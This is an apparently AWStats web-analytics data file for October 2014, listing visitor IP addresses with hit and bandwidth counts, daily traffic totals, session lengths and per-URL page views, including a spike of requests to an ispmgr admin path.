91.215.126.185 2 3 749075 20141028220937
79.99.110.226 2 3 749075 20141023125341
150.70.173.42 1 1 1998 20141023154408
198.199.75.123 1 2 8350 20141026025903
178.165.114.78 2 3 749075 20141027160027
69.58.178.57 2 2 3996 20141011203315
93.72.46.31 2 3 749075 20141001110347
209.133.77.166 1 1 1998 20141023175622
54.165.251.39 1 1 1998 20141007093401
178.151.108.184 2 3 749075 20141028151937
209.133.77.164 5 5 9990 20141030151738
185.10.104.130 2 2 3996 20141024075047
54.203.33.124 2 2 3996 20141028233508
176.37.236.8 2 3 749075 20141025113032
93.72.236.94 2 3 749075 20141009000634
130.211.118.116 1 1 1998 20141027172045
202.46.53.61 1 1 1998 20141019161446
54.184.5.115 1 1 1998 20141024095137
209.133.77.167 5 5 9990 20141030154952
54.213.225.160 1 1 48 20141006142442
146.148.52.138 1 1 1998 20141007200835
85.113.58.138 1 1 1998 20141019141324
77.222.144.170 2 3 749075 20141014162815
178.214.221.169 2 3 749075 20141027114516
82.193.99.141 2 3 749075 20141025150336
176.104.1.186 2 3 749075 20141024131904
176.104.12.172 2 3 749075 20141017181306
74.52.245.146 1 1 1998 20141013023635
176.9.129.84 2 2 3996 20141028180204
91.235.71.242 3 4 751073 20141028114930
95.158.48.103 3 4 751073 20141026164430
93.72.167.168 2 3 749075 20141029223321
178.158.238.102 4 7 14344 20141030155928
54.188.23.95 2 2 3996 20141006093607
194.11.28.16 2 3 749075 20141026170108
69.49.114.10 4 6 1498150 20141031210410
130.185.139.213 5 5 9990 20141029153840
130.0.37.186 2 3 749075 20141025001649
93.72.19.50 2 3 749075 20141027124435
146.148.80.223 1 1 1998 20141007175945
198.211.102.105 1 2 8350 20141003071511
134.249.88.20 2 3 749075 20141027170504
95.67.57.30 2 3 749075 20141024132229
130.211.139.19 1 1 1998 20141010175809
213.111.98.7 2 4 10348 20141014134511
94.154.222.73 2 3 749075 20141010155912
50.112.74.27 1 1 1998 20141020115620
178.95.4.79 1 1 1998 20141007173903
37.187.77.163 1 1 48 20141007050120
66.249.81.66 2 4 16700 20141020212648
91.121.100.66 1 1 1998 20141004131239
23.236.55.192 1 1 1998 20141004180058
185.30.200.122 2 3 749075 20141025094138
93.126.70.34 2 3 749075 20141021214912
109.86.71.87 2 3 749075 20141016102540
89.145.108.207 5 5 9990 20141030162051
148.251.92.106 2 2 3996 20141006083556
37.57.138.78 2 3 749075 20141029113009
138.128.16.74 1 2 5887 20141027022932
69.64.32.191 4 4 7992 20141026032711
188.122.232.12 2 3 749075 20141013001043
159.224.88.20 1 1 1998 20141012173033
130.211.114.181 1 1 1998 20141012175809
95.133.54.35 1 1 1998 20141018192106
176.36.28.33 2 3 749075 20141027092657
130.211.123.198 1 1 1998 20141016173625
162.243.15.197 1 1 1998 20141026234558
195.177.223.10 2 3 749075 20141001104946
178.94.54.139 2 3 749075 20141030132522
176.36.241.45 2 3 749075 20141018201603
130.211.189.62 1 1 1998 20141005175942
195.88.242.35 1 1 1998 20141017031852
91.196.100.91 1 2 8350 20141029163458
93.74.182.216 2 3 749075 20141025214900
146.148.86.0 1 1 1998 20141020182133
95.133.92.248 2 3 749075 20141021084806
31.202.212.48 2 3 749075 20141001181748
130.211.167.27 1 1 1998 20141006175946
91.212.22.11 2 3 749075 20141022120239
150.70.75.212 1 1 1998 20141028103311
176.37.156.9 2 3 749075 20141013192406
209.133.77.163 6 6 11988 20141030175940
206.183.1.74 1 2 8350 20141018122158
78.47.45.27 1 1 1998 20141006084720
62.244.21.137 3 5 757425 20141028164630
146.148.58.10 1 1 1998 20141021182207
146.148.72.223 1 1 1998 20141002175447
150.70.173.60 1 1 1998 20141003153958
150.70.97.123 1 1 1998 20141010103445
91.217.179.17 2 3 749075 20141004114108
93.72.9.113 2 3 749075 20141025190954
54.214.136.84 2 2 3996 20141026083640
194.44.120.170 4 6 1498150 20141031211941
209.133.77.169 3 3 5994 20141031110200
69.10.33.130 1 1 48 20141006071025
176.8.105.233 2 3 749075 20141027081057
95.133.91.20 1 1 1998 20141021163756
95.28.171.19 2 3 749075 20141016215246
54.189.201.69 1 1 1998 20141016103158
176.104.16.242 1 1 0 20141017120102
158.85.89.5 1 1 1998 20141031223214
176.36.126.17 2 3 749075 20141025070813
88.198.184.248 1 1 1998 20141014025744
54.172.124.105 1 1 1998 20141026112146
213.227.252.138 4 6 1498150 20141028131840
205.186.134.213 1 1 48 20141007174214
79.164.156.135 4 6 1498150 20141031155347
82.117.232.110 2 3 749075 20141027101519
77.52.157.22 1 2 8350 20141003174915
31.172.136.25 2 3 749075 20141006143819
37.73.245.55 1 2 8350 20141001151557
54.184.130.181 1 1 1998 20141012094151
91.220.120.132 1 2 8350 20141028081736
62.221.70.83 1 1 1998 20141011050547
162.213.220.80 1 1 1998 20141030152321
188.190.56.11 2 3 749075 20141025100007
176.120.117.224 3 4 751073 20141024143345
54.191.244.94 1 2 8350 20141024141913
54.211.91.134 3 3 5994 20141028201109
95.158.48.70 2 3 749075 20141027075150
178.86.6.217 1 1 1998 20141003012103
119.63.193.130 6 6 11988 20141030045714
146.148.93.71 1 1 1998 20141005200648
95.133.127.61 1 1 1998 20141005185246
94.179.51.214 2 3 749075 20141025231529
188.231.136.163 2 3 749075 20141026124124
178.151.122.1 2 3 749075 20141028151304
46.229.168.50 1 1 1998 20141021155916
78.152.169.99 2 3 749075 20141020122007
93.171.242.58 2 3 749075 20141024200101
54.190.29.236 1 1 1998 20141002095020
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 31
20141001 24 35 6021288 11
20141002 8 8 15984 8
20141003 35 45 3824622 24
20141004 12 13 769055 11
20141005 7 10 769306 6
20141006 21 24 2271297 16
20141007 22 27 2285999 19
20141008 22 25 799741 19
20141009 18 23 3020682 14
20141010 35 43 3806079 26
20141011 13 15 1516132 10
20141012 6 6 9990 6
20141013 22 28 3775703 13
20141014 19 28 3041223 12
20141015 18 25 5251517 10
20141016 28 37 5284201 19
20141017 25 31 3777701 19
20141018 12 15 1518488 9
20141019 14 14 22074 12
20141020 1800 1811 5548955 22
20141021 25 32 3784127 19
20141022 23 31 6006586 15
20141023 38 46 4556639 31
20141024 65 92 15052862 32
20141025 54 82 15769611 26
20141026 46 62 9788689 25
20141027 75 112 21010363 34
20141028 59 78 11319475 36
20141029 37 48 7527072 25
20141030 49 64 7551048 27
20141031 30 40 6024926 17
END_DAY

# Session range - Number of visits
BEGIN_SESSION 7
1h+ 1
5mn-15mn 7
0s-30s 532
30s-2mn 18
2mn-5mn 6
15mn-30mn 7
30mn-1h 2
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 10 first Pages must be first (order not required for others)
BEGIN_SIDER 4
/manager/ispmgr 1770 975154 1 1
/ 666 1285268 569 377
/index.swf 225 157774425 2 194
/index.php 1 48 1 1
END_SIDER
